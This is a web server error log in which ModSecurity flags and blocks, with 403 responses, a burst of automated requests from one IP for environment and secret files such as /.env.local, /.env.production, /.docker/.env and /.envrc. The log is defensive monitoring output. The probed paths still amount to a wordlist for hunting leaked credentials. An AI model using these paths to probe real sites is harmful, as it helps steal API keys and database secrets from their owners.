[Sat Mar 21 04:10:04.635630 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "ab4MDNTas8ZTYtMe0Y3Q3AAAAAE"]
[Sat Mar 21 04:10:04.635787 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "ab4MDNTas8ZTYtMe0Y3Q3AAAAAE"]
[Sat Mar 21 04:10:04.635966 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "ab4MDNTas8ZTYtMe0Y3Q3AAAAAE"]
[Sat Mar 21 04:10:04.930217 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.staging"] [unique_id "ab4MDNTas8ZTYtMe0Y3Q3QAAAAE"]
[Sat Mar 21 04:10:04.930406 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.staging"] [unique_id "ab4MDNTas8ZTYtMe0Y3Q3QAAAAE"]
[Sat Mar 21 04:10:04.930544 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.staging"] [unique_id "ab4MDNTas8ZTYtMe0Y3Q3QAAAAE"]
[Sat Mar 21 04:10:05.820490 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.staging"] [unique_id "ab4MDRsiL8ED2XitCKA8IgAAAAI"]
[Sat Mar 21 04:10:05.820650 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.staging"] [unique_id "ab4MDRsiL8ED2XitCKA8IgAAAAI"]
[Sat Mar 21 04:10:05.820786 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.staging"] [unique_id "ab4MDRsiL8ED2XitCKA8IgAAAAI"]
[Sat Mar 21 04:10:06.114861 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8IwAAAAI"]
[Sat Mar 21 04:10:06.115044 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8IwAAAAI"]
[Sat Mar 21 04:10:06.115191 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8IwAAAAI"]
[Sat Mar 21 04:10:06.409386 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8JAAAAAI"]
[Sat Mar 21 04:10:06.409594 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8JAAAAAI"]
[Sat Mar 21 04:10:06.410269 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8JAAAAAI"]
[Sat Mar 21 04:10:06.704405 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "ab4MDhsiL8ED2XitCKA8JQAAAAI"]
[Sat Mar 21 04:10:06.704588 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "ab4MDhsiL8ED2XitCKA8JQAAAAI"]
[Sat Mar 21 04:10:06.704734 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "ab4MDhsiL8ED2XitCKA8JQAAAAI"]
[Sat Mar 21 04:10:06.998851 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8JgAAAAI"]
[Sat Mar 21 04:10:06.999007 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8JgAAAAI"]
[Sat Mar 21 04:10:06.999151 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "ab4MDhsiL8ED2XitCKA8JgAAAAI"]
[Sat Mar 21 04:10:07.293426 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env"] [unique_id "ab4MDxsiL8ED2XitCKA8JwAAAAI"]
[Sat Mar 21 04:10:07.293585 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env"] [unique_id "ab4MDxsiL8ED2XitCKA8JwAAAAI"]
[Sat Mar 21 04:10:07.293733 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env"] [unique_id "ab4MDxsiL8ED2XitCKA8JwAAAAI"]
[Sat Mar 21 04:10:07.587967 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.production"] [unique_id "ab4MDxsiL8ED2XitCKA8KAAAAAI"]
[Sat Mar 21 04:10:07.588120 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.production"] [unique_id "ab4MDxsiL8ED2XitCKA8KAAAAAI"]
[Sat Mar 21 04:10:07.588251 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.production"] [unique_id "ab4MDxsiL8ED2XitCKA8KAAAAAI"]
[Sat Mar 21 04:10:07.882666 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab4MDxsiL8ED2XitCKA8KQAAAAI"]
[Sat Mar 21 04:10:07.882827 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab4MDxsiL8ED2XitCKA8KQAAAAI"]
[Sat Mar 21 04:10:07.883011 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab4MDxsiL8ED2XitCKA8KQAAAAI"]
[Sat Mar 21 04:10:08.177731 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.production"] [unique_id "ab4MEBsiL8ED2XitCKA8KgAAAAI"]
[Sat Mar 21 04:10:08.177892 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.production"] [unique_id "ab4MEBsiL8ED2XitCKA8KgAAAAI"]
[Sat Mar 21 04:10:08.178094 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.production"] [unique_id "ab4MEBsiL8ED2XitCKA8KgAAAAI"]
[Sat Mar 21 04:10:08.472230 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.production"] [unique_id "ab4MEBsiL8ED2XitCKA8KwAAAAI"]
[Sat Mar 21 04:10:08.472400 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.production"] [unique_id "ab4MEBsiL8ED2XitCKA8KwAAAAI"]
[Sat Mar 21 04:10:08.472552 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.production"] [unique_id "ab4MEBsiL8ED2XitCKA8KwAAAAI"]
[Sat Mar 21 04:10:08.766794 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.local"] [unique_id "ab4MEBsiL8ED2XitCKA8LAAAAAI"]
[Sat Mar 21 04:10:08.766961 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.local"] [unique_id "ab4MEBsiL8ED2XitCKA8LAAAAAI"]
[Sat Mar 21 04:10:08.767115 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.local"] [unique_id "ab4MEBsiL8ED2XitCKA8LAAAAAI"]
[Sat Mar 21 04:10:09.061533 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.environment"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "ab4MERsiL8ED2XitCKA8LQAAAAI"]
